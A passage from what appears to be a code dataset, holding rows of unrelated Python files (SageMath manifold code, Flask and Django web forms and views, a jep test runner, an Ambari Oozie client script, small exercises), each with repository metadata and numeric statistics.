return self._restrictions[subdomain]
def at(self, point):
r"""
Value of ``self`` at a given point.
If the current field of tangent-space automorphisms is
.. MATH::
a:\ U \longrightarrow T^{(1,1)} M
associated with the differentiable map
.. MATH::
\Phi:\ U \longrightarrow M,
where `U` and `M` are two manifolds (possibly `U = M` and
`\Phi = \mathrm{Id}_M`), then for any point `p \in U`,
`a(p)` is an automorphism of the tangent space `T_{\Phi(p)}M`.
INPUT:
- ``point`` -- :class:`~sage.manifolds.point.ManifoldPoint`;
point `p` in the domain of the field of automorphisms `a`
OUTPUT:
- the automorphism `a(p)` of the tangent vector space `T_{\Phi(p)}M`
EXAMPLES:
Automorphism at some point of a tangent space of a 2-dimensional
manifold::
sage: M = Manifold(2, 'M')
sage: c_xy.<x,y> = M.chart()
sage: a = M.automorphism_field([[1+exp(y), x*y], [0, 1+x^2]],
....: name='a')
sage: a.display()
a = (e^y + 1) d/dx*dx + x*y d/dx*dy + (x^2 + 1) d/dy*dy
sage: p = M.point((-2,3), name='p') ; p
Point p on the 2-dimensional differentiable manifold M
sage: ap = a.at(p) ; ap
Automorphism a of the Tangent space at Point p on the
2-dimensional differentiable manifold M
sage: ap.display()
a = (e^3 + 1) d/dx*dx - 6 d/dx*dy + 5 d/dy*dy
sage: ap.parent()
General linear group of the Tangent space at Point p on the
2-dimensional differentiable manifold M
The identity map of the tangent space at point ``p``::
sage: id = M.tangent_identity_field() ; id
Field of tangent-space identity maps on the 2-dimensional
differentiable manifold M
sage: idp = id.at(p) ; idp
Identity map of the Tangent space at Point p on the 2-dimensional
differentiable manifold M
sage: idp is M.tangent_space(p).identity_map()
True
sage: idp.display()
Id = d/dx*dx + d/dy*dy
sage: idp.parent()
General linear group of the Tangent space at Point p on the
2-dimensional differentiable manifold M
sage: idp * ap == ap
True
"""
if point not in self._domain:
raise TypeError("the {} is not in the domain of the {}".format(
point, self))
dest_map = self._fmodule._dest_map
if dest_map.is_identity():
amb_point = point
else:
amb_point = dest_map(point) # "ambient" point
ts = amb_point._manifold.tangent_space(amb_point)
if self._is_identity:
return ts.identity_map()
resu = ts.automorphism(name=self._name, latex_name=self._latex_name)
for frame, comp in self._components.items():
comp_resu = resu.add_comp(frame.at(point))
for ind, val in comp._comp.items():
comp_resu._comp[ind] = val(point)
return resu
| 40.418486 | 201 | 0.537877 | 7,491 | 55,535 | 3.878387 | 0.065812 | 0.014456 | 0.028396 | 0.048911 | 0.745981 | 0.70602 | 0.671497 | 0.655079 | 0.631432 | 0.607235 | 0 | 0.020769 | 0.341082 | 55,535 | 1,373 | 202 | 40.447924 | 0.773181 | 0.657207 | 0 | 0.519713 | 0 | 0 | 0.058071 | 0 | 0 | 0 | 0 | 0.001457 | 0.007168 | 1 | 0.071685 | false | 0 | 0.028674 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0ee726969a8149a125a512c96fd40fc7e8e7cf2e | 868 | py | Python | app/main/forms.py | Wambuilucy/Pitch-App | 1cf4004a01e8efb483a30fb7d9a95791a42d673f | [
"Unlicense"
] | null | null | null | app/main/forms.py | Wambuilucy/Pitch-App | 1cf4004a01e8efb483a30fb7d9a95791a42d673f | [
"Unlicense"
] | 6 | 2020-02-14T12:13:40.000Z | 2020-02-14T12:13:47.000Z | app/main/forms.py | Wambuilucy/Pitch-App | 1cf4004a01e8efb483a30fb7d9a95791a42d673f | [
"Unlicense"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField,PasswordField,SubmitField,BooleanField,SubmitField,TextAreaField,RadioField
from wtforms.validators import Required,Email,EqualTo
from wtforms import ValidationError
class PitchForm(FlaskForm):
title = StringField('Title', validators=[Required()])
description = TextAreaField("What would you like to pitch ?",validators=[Required()])
category = RadioField('Label', choices=[ ('promotionpitch','promotionpitch'), ('interviewpitch','interviewpitch'),('pickuplines','pickuplines'),('productpitch','productpitch')],validators=[Required()])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
description = TextAreaField('Add comment',validators=[Required()])
submit = SubmitField()
class UpvoteForm(FlaskForm):
submit = SubmitField()
class Downvote(FlaskForm):
submit = SubmitField() | 36.166667 | 202 | 0.782258 | 82 | 868 | 8.268293 | 0.487805 | 0.106195 | 0.050147 | 0.103245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085253 | 868 | 24 | 203 | 36.166667 | 0.853904 | 0 | 0 | 0.1875 | 0 | 0 | 0.18318 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.0625 | 0.25 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
0ef9817ae54babdd5cdd52162ecbc95e2c5817f4 | 165 | py | Python | q1/files_creator.py | nmf2/threads | 7895d2f453329900fe86c03cea138482854a94bb | [
"Apache-2.0"
] | null | null | null | q1/files_creator.py | nmf2/threads | 7895d2f453329900fe86c03cea138482854a94bb | [
"Apache-2.0"
] | null | null | null | q1/files_creator.py | nmf2/threads | 7895d2f453329900fe86c03cea138482854a94bb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
from random import randint
for i in range(1,11):
file = open(str(i) + ".in", "w");
for j in range(1,11):
file.write(str(randint(1,10)) + '\n') | 23.571429 | 39 | 0.612121 | 32 | 165 | 3.15625 | 0.65625 | 0.059406 | 0.158416 | 0.19802 | 0.277228 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064748 | 0.157576 | 165 | 7 | 39 | 23.571429 | 0.661871 | 0.09697 | 0 | 0 | 0 | 0 | 0.040268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
16070ec134fefccd1a77b7d608619fd79c5b1975 | 260 | py | Python | 1097/10971.py | bochainwu/self_learning2021 | a80580a4bb82e280f06b093f19d93ff354f7cd17 | [
"MIT"
] | 5 | 2021-07-17T03:34:19.000Z | 2021-11-16T11:28:24.000Z | 1097/10971.py | bochainwu/self_learning2021 | a80580a4bb82e280f06b093f19d93ff354f7cd17 | [
"MIT"
] | 1 | 2021-07-18T06:33:30.000Z | 2021-07-19T14:11:14.000Z | 1097/10971.py | bochainwu/self_learning2021 | a80580a4bb82e280f06b093f19d93ff354f7cd17 | [
"MIT"
] | null | null | null | a, b = map(int, input('').split(' '))
n = int(input(''))
ans = 0
for i in range(n):
shop = [int(i) for i in input('').split(' ') if abs(int(i)) == a or b]
if shop.count(a) > shop.count(-a) and shop.count(b) > shop.count(-b):
ans += 1
print(ans) | 32.5 | 74 | 0.526923 | 49 | 260 | 2.795918 | 0.428571 | 0.262774 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009852 | 0.219231 | 260 | 8 | 75 | 32.5 | 0.665025 | 0 | 0 | 0 | 0 | 0 | 0.007663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
160937a18ff277f8680d5a7ad5efdd26bb3768f9 | 584 | py | Python | venv/Lib/site-packages/pybrain3/optimization/memetic/innermemetic.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/optimization/memetic/innermemetic.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/optimization/memetic/innermemetic.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | __author__ = 'Tom Schaul, tom@idsia.ch'
from .memetic import MemeticSearch
from pybrain3.optimization.populationbased.es import ES
class InnerMemeticSearch(ES, MemeticSearch):
""" Population-based memetic search """
mu = 5
lambada = 5
def _learnStep(self):
self.switchMutations()
ES._learnStep(self)
self.switchMutations()
@property
def batchSize(self):
if self.evaluatorIsNoisy:
return (self.mu + self.lambada)*self.localSteps
else:
return self.lambada*self.localSteps
| 24.333333 | 59 | 0.640411 | 59 | 584 | 6.237288 | 0.542373 | 0.070652 | 0.092391 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007042 | 0.270548 | 584 | 23 | 60 | 25.391304 | 0.856808 | 0.053082 | 0 | 0.125 | 0 | 0 | 0.044037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16194bd893b9deabcea45a90fa6f7d896b2b6abf | 2,639 | py | Python | tests/__main__.py | karpierz/jtypes.jep | 0e2347c3144022313802183c75fc8944ac6ddef5 | [
"Zlib"
] | 1 | 2021-05-18T03:38:21.000Z | 2021-05-18T03:38:21.000Z | tests/__main__.py | karpierz/jtypes.jep | 0e2347c3144022313802183c75fc8944ac6ddef5 | [
"Zlib"
] | null | null | null | tests/__main__.py | karpierz/jtypes.jep | 0e2347c3144022313802183c75fc8944ac6ddef5 | [
"Zlib"
] | null | null | null | # Copyright (c) 2014-2018 Adam Karpierz
# Licensed under the zlib/libpng License
# http://opensource.org/licenses/zlib
from __future__ import absolute_import, print_function
import unittest
import sys
import os
import importlib
import logging
from . import test_dir
test_java = os.path.join(test_dir, "java")
test_jlib = os.path.join(test_dir, "lib")
def test_suite(names=None, omit=("run", "runtests", "test_jdbc")):
from .python import __name__ as pkg_name
from .python import __path__ as pkg_path
import unittest
import pkgutil
if names is None:
names = [name for _, name, _ in pkgutil.iter_modules(pkg_path)
if name != "__main__" and name not in omit]
names = [".".join((pkg_name, name)) for name in names]
tests = unittest.defaultTestLoader.loadTestsFromNames(names)
return tests
# embedding does not setup argv
sys.argv = [""]
def main():
sys.modules["jep"] = importlib.import_module("jt.jep")
sys.modules["jep.__about__"] = importlib.import_module("jt.jep.__about__")
sys.modules["jep.console"] = importlib.import_module("jt.jep.console")
sys.modules["jep.java_import_hook"] = importlib.import_module("jt.jep.java_import_hook")
sys.modules["jep.redirect_streams"] = importlib.import_module("jt.jep.redirect_streams")
sys.modules["jep.shared_modules_hook"] = importlib.import_module("jt.jep.shared_modules_hook")
sys.modules["jep.jdbc"] = importlib.import_module("jt.jep.jdbc")
#sys.modules["jep.version"] = importlib.import_module("jt.jep.version")
sys.modules["jep._jep"] = importlib.import_module("jt.jep._jep")
print("Running testsuite", "\n", file=sys.stderr)
from jt.jep._jep._jvm import start_jvm, stop_jvm
from jep import java_import_hook
start_jvm(path=r"C:/Program Files/Java/jdk1.8.0_181/jre/bin/server/jvm.dll",
options=["-Djava.class.path={}".format(os.pathsep.join(
[os.path.join(test_java, "classes"),
os.path.join(test_jlib, "sqlitejdbc-v056.jar")])),
"-ea", "-Xms64M", "-Xmx256M"])
java_import_hook.setupImporter(None)
try:
tests = test_suite(sys.argv[1:] or None)
result = unittest.TextTestRunner(verbosity=2).run(tests)
#except SystemExit:
# pass
finally:
stop_jvm()
sys.exit(0 if result.wasSuccessful() else 1)
if __name__.rpartition(".")[-1] == "__main__":
# logging.basicConfig(level=logging.INFO)
# logging.basicConfig(level=logging.DEBUG)
main()
| 35.186667 | 98 | 0.657067 | 343 | 2,639 | 4.813411 | 0.364431 | 0.090854 | 0.070866 | 0.125379 | 0.170806 | 0.071472 | 0 | 0 | 0 | 0 | 0 | 0.012931 | 0.208791 | 2,639 | 74 | 99 | 35.662162 | 0.777778 | 0.125426 | 0 | 0.042553 | 0 | 0.021277 | 0.183203 | 0.061358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.468085 | 0 | 0.531915 | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
161d00c76a43f1b773da58bdf8c9681ce81c8191 | 445 | py | Python | tensorpack/utils/serialize.py | myelintek/tensorpack | fcbf5869d78cf7f3b59c46318b6c883a7ea12056 | [
"Apache-2.0"
] | 3 | 2017-12-02T16:49:42.000Z | 2018-11-04T16:53:44.000Z | tensorpack/utils/serialize.py | dongzhuoyao/tensorpack | 78bcf6053172075a761eac90ab22f0b631b272a0 | [
"Apache-2.0"
] | 6 | 2020-01-28T23:03:24.000Z | 2022-02-10T01:21:18.000Z | tensorpack/utils/serialize.py | wdings/Mask-RCNN | 8d5ae5cc2cfcf2e4e53b4d1064ac9e727f736d09 | [
"Apache-2.0"
] | 5 | 2017-11-15T14:46:27.000Z | 2018-11-04T16:54:06.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: serialize.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import msgpack
import msgpack_numpy
msgpack_numpy.patch()
__all__ = ['loads', 'dumps']
def dumps(obj):
"""
Serialize an object.
Returns:
str
"""
return msgpack.dumps(obj, use_bin_type=True)
def loads(buf):
"""
Args:
buf (str): serialized object.
"""
return msgpack.loads(buf)
| 14.354839 | 48 | 0.606742 | 55 | 445 | 4.763636 | 0.654545 | 0.099237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002967 | 0.242697 | 445 | 30 | 49 | 14.833333 | 0.774481 | 0.402247 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
164170955bfedd04395fe0b88be29a090bc22651 | 815 | py | Python | superlists/lists/views.py | BeanYoung/test-driven-development-with-python | 438726b39ce08bed886dad09d72bbc472911e441 | [
"MIT"
] | null | null | null | superlists/lists/views.py | BeanYoung/test-driven-development-with-python | 438726b39ce08bed886dad09d72bbc472911e441 | [
"MIT"
] | null | null | null | superlists/lists/views.py | BeanYoung/test-driven-development-with-python | 438726b39ce08bed886dad09d72bbc472911e441 | [
"MIT"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import redirect, render
from lists.models import Item, List
def home_page(request):
return render(request, 'home.html')
def list_view(request, list_id):
list_ = List.objects.get(id=list_id)
items = Item.objects.filter(list=list_)
return render(request, 'list.html', {'items': items, 'list': list_})
def new_list(request):
new_item_text = request.POST.get('item_text')
list_ = List.objects.create()
Item.objects.create(text=new_item_text, list=list_)
return redirect('/lists/%d/' % list_.id)
def add_item(request, list_id):
list_ = List.objects.get(id=list_id)
new_item_text = request.POST.get('item_text')
Item.objects.create(text=new_item_text, list=list_)
return redirect('/lists/%d/' % list_.id)
| 28.103448 | 72 | 0.71411 | 121 | 815 | 4.586777 | 0.247934 | 0.100901 | 0.079279 | 0.086486 | 0.497297 | 0.497297 | 0.497297 | 0.497297 | 0.378378 | 0.378378 | 0 | 0 | 0.148466 | 815 | 28 | 73 | 29.107143 | 0.799712 | 0 | 0 | 0.421053 | 0 | 0 | 0.079755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.157895 | 0.052632 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16426f26d1eee5003b34448807be0389b649a372 | 756 | py | Python | app/main/forms.py | fridahnamudu/pitches | 1ab16e15ddd390ddb0b977a0ff8edb2638d78b3f | [
"Unlicense",
"MIT"
] | null | null | null | app/main/forms.py | fridahnamudu/pitches | 1ab16e15ddd390ddb0b977a0ff8edb2638d78b3f | [
"Unlicense",
"MIT"
] | null | null | null | app/main/forms.py | fridahnamudu/pitches | 1ab16e15ddd390ddb0b977a0ff8edb2638d78b3f | [
"Unlicense",
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField,SelectField
from wtforms.validators import Required
class PitchForm(FlaskForm):
title = StringField('Pitch title', validators=[Required()])
text = TextAreaField('Text', validators=[Required()])
category = SelectField('Type', choices=[('interview', 'Interview pitch'),('product','Product pitch'),('promotion','Promotion pitch')],validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Bio.', validators=[Required()])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
text = TextAreaField('Leave a comment:', validators=[Required()])
submit = SubmitField('Submit')
| 34.363636 | 162 | 0.728836 | 73 | 756 | 7.534247 | 0.410959 | 0.163636 | 0.130909 | 0.190909 | 0.241818 | 0.167273 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123016 | 756 | 21 | 163 | 36 | 0.829563 | 0 | 0 | 0.214286 | 0 | 0 | 0.165344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
164b14e6af53eb7a417ef35428b46f0d148c394d | 98 | py | Python | deep_ner/__init__.py | bond005/elmo_ner | c6135cfca5d7bf817a22c8c8631e7f81f6f05f94 | [
"Apache-2.0"
] | 80 | 2019-03-21T13:04:32.000Z | 2021-09-27T16:53:34.000Z | deep_ner/__init__.py | bond005/elmo_ner | c6135cfca5d7bf817a22c8c8631e7f81f6f05f94 | [
"Apache-2.0"
] | 7 | 2019-06-06T13:49:54.000Z | 2022-02-10T01:05:18.000Z | deep_ner/__init__.py | bond005/elmo_ner | c6135cfca5d7bf817a22c8c8631e7f81f6f05f94 | [
"Apache-2.0"
] | 16 | 2019-03-20T06:54:40.000Z | 2021-09-23T17:40:24.000Z | __version__ = '0.0.6'
__all__ = ['elmo_ner', 'bert_ner', 'dataset_splitting', 'quality', 'utils']
| 32.666667 | 75 | 0.673469 | 13 | 98 | 4.230769 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.102041 | 98 | 2 | 76 | 49 | 0.590909 | 0 | 0 | 0 | 0 | 0 | 0.510204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
164cc9130c4b330fde22087d9a65efb7b96d3f7b | 2,704 | py | Python | hdp-ambari-mpack-3.1.4.0/stacks/HDP/3.0/services/OOZIE/package/scripts/oozie_client.py | dropoftruth/dfhz_hdp_mpack | 716f0396dce25803365c1aed9904b74fbe396f79 | [
"Apache-2.0"
] | 3 | 2022-01-05T10:10:36.000Z | 2022-02-21T06:57:06.000Z | hdp-ambari-mpack-3.1.4.0/stacks/HDP/3.0/services/OOZIE/package/scripts/oozie_client.py | dropoftruth/dfhz_hdp_mpack | 716f0396dce25803365c1aed9904b74fbe396f79 | [
"Apache-2.0"
] | 13 | 2019-06-05T07:47:00.000Z | 2019-12-29T08:29:27.000Z | hdp-ambari-mpack-3.1.4.0/stacks/HDP/3.0/services/OOZIE/package/scripts/oozie_client.py | dropoftruth/dfhz_hdp_mpack | 716f0396dce25803365c1aed9904b74fbe396f79 | [
"Apache-2.0"
] | 2 | 2022-01-05T09:09:20.000Z | 2022-02-21T07:02:06.000Z | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions import stack_select
from resource_management.libraries.functions.constants import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.core.logger import Logger
from resource_management.core.exceptions import ClientComponentHasNoStatus
from oozie import oozie
from oozie_service import oozie_service
class OozieClient(Script):
def install(self, env):
self.install_packages(env)
self.configure(env)
def configure(self, env):
import params
env.set_params(params)
oozie(is_server=False)
def status(self, env):
raise ClientComponentHasNoStatus()
def pre_upgrade_restart(self, env, upgrade_type=None):
import params
env.set_params(params)
# this function should not execute if the version can't be determined or
# the stack does not support rolling upgrade
if not (params.version and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.version)):
return
Logger.info("Executing Oozie Client Stack Upgrade pre-restart")
stack_select.select_packages(params.version)
# We substitute some configs (oozie.authentication.kerberos.principal) before generation (see oozie.py and params.py).
# This function returns changed configs (it's used for config generation before config download)
def generate_configs_get_xml_file_content(self, filename, dictionary):
if dictionary == 'oozie-site':
import params
config = self.get_config()
return {'configurations': params.oozie_site,
'configuration_attributes': config['configurationAttributes'][dictionary]}
else:
return super(OozieClient, self).generate_configs_get_xml_file_content(filename, dictionary)
if __name__ == "__main__":
OozieClient().execute()
| 36.053333 | 120 | 0.782544 | 361 | 2,704 | 5.736842 | 0.448753 | 0.028972 | 0.063737 | 0.059874 | 0.117817 | 0.059874 | 0 | 0 | 0 | 0 | 0 | 0.001744 | 0.151627 | 2,704 | 74 | 121 | 36.540541 | 0.901046 | 0.407544 | 0 | 0.138889 | 0 | 0 | 0.079924 | 0.029578 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138889 | false | 0 | 0.333333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
164d9e71056bb40232254b47f9c447869e884b40 | 546 | py | Python | DLServer/ModelList.py | ruman-shaikh/DeepLearningServer | 1098b7c8477d3824274c37c7345ebd90cef48777 | [
"MIT"
] | 1 | 2020-09-04T08:27:16.000Z | 2020-09-04T08:27:16.000Z | DLServer/ModelList.py | ruman-shaikh/DeepLearningServer | 1098b7c8477d3824274c37c7345ebd90cef48777 | [
"MIT"
] | null | null | null | DLServer/ModelList.py | ruman-shaikh/DeepLearningServer | 1098b7c8477d3824274c37c7345ebd90cef48777 | [
"MIT"
] | null | null | null | import numpy as np
def ImageNetCatsVDogs(results):
classes = {0.0 : "Cat", 1.0 : "Dog"}
return classes[results[0][0]]
def CatsVDogs(results):
classes = {0.0 : "Cat", 1.0 : "Dog"}
return classes[results[0][0]]
def CatsVDogsKeras(results):
classes = {0.0 : "Cat", 1.0 : "Dog"}
return classes[np.argmax(results)]
def PredToStr(ModelName, results):
ModelList = {
"ImageNetCatsVDogs" : ImageNetCatsVDogs,
"CatsVDogs" : CatsVDogs,
"CatsVDogsKeras" : CatsVDogsKeras
}
return ModelList[ModelName](results) | 26 | 43 | 0.652015 | 64 | 546 | 5.5625 | 0.296875 | 0.02809 | 0.126404 | 0.134831 | 0.379213 | 0.379213 | 0.379213 | 0.379213 | 0.379213 | 0.379213 | 0 | 0.036364 | 0.194139 | 546 | 21 | 44 | 26 | 0.772727 | 0 | 0 | 0.294118 | 0 | 0 | 0.110057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.058824 | 0 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16505bc8332986fe61331bef482d1ca14c567abf | 245 | py | Python | code/Dictionary/key_of_min.py | jumploop/30-seconds-of-python | bfcc5a35d9bd0bba67e81de5715dba21e1ba43be | [
"CC0-1.0"
] | null | null | null | code/Dictionary/key_of_min.py | jumploop/30-seconds-of-python | bfcc5a35d9bd0bba67e81de5715dba21e1ba43be | [
"CC0-1.0"
] | null | null | null | code/Dictionary/key_of_min.py | jumploop/30-seconds-of-python | bfcc5a35d9bd0bba67e81de5715dba21e1ba43be | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
功能实现:在字典中查找最小值的键。
解读:
使用min()并将key参数设置为dict.get()来查找并返回给定字典中最小值的键。
"""
def key_of_min(d):
return min(d, key=d.get)
# Examples
print(key_of_min({'a': 4, 'b': 0, 'c': 13}))
# output:
# b
| 12.25 | 44 | 0.604082 | 38 | 245 | 3.789474 | 0.763158 | 0.069444 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024272 | 0.159184 | 245 | 19 | 45 | 12.894737 | 0.674757 | 0.526531 | 0 | 0 | 0 | 0 | 0.028846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
16570c371b0050e20e4bd40f17bb05001dc4a9ef | 65 | py | Python | Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 1/1.py | jaswinder9051998/Resources | fd468af37bf24ca57555d153ee64693c018e822e | [
"MIT"
] | 101 | 2021-12-20T11:57:11.000Z | 2022-03-23T09:49:13.000Z | 50-Python-Exercises/Exercises/Exercise 1/1.py | kuwarkapur/Hacktoberfest-2022 | efaafeba5ce51d8d2e2d94c6326cc20bff946f17 | [
"MIT"
] | 4 | 2022-01-12T11:55:56.000Z | 2022-02-12T04:53:33.000Z | 50-Python-Exercises/Exercises/Exercise 1/1.py | kuwarkapur/Hacktoberfest-2022 | efaafeba5ce51d8d2e2d94c6326cc20bff946f17 | [
"MIT"
] | 38 | 2022-01-12T11:56:16.000Z | 2022-03-23T10:07:52.000Z | #What will this script produce?
#A: 3
a = 1
a = 2
a = 3
print(a)
| 9.285714 | 31 | 0.6 | 15 | 65 | 2.6 | 0.666667 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0.261538 | 65 | 6 | 32 | 10.833333 | 0.729167 | 0.523077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1668121bcb556a608759d40e681bc09d6d447f6a | 1,021 | py | Python | ds_deque.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
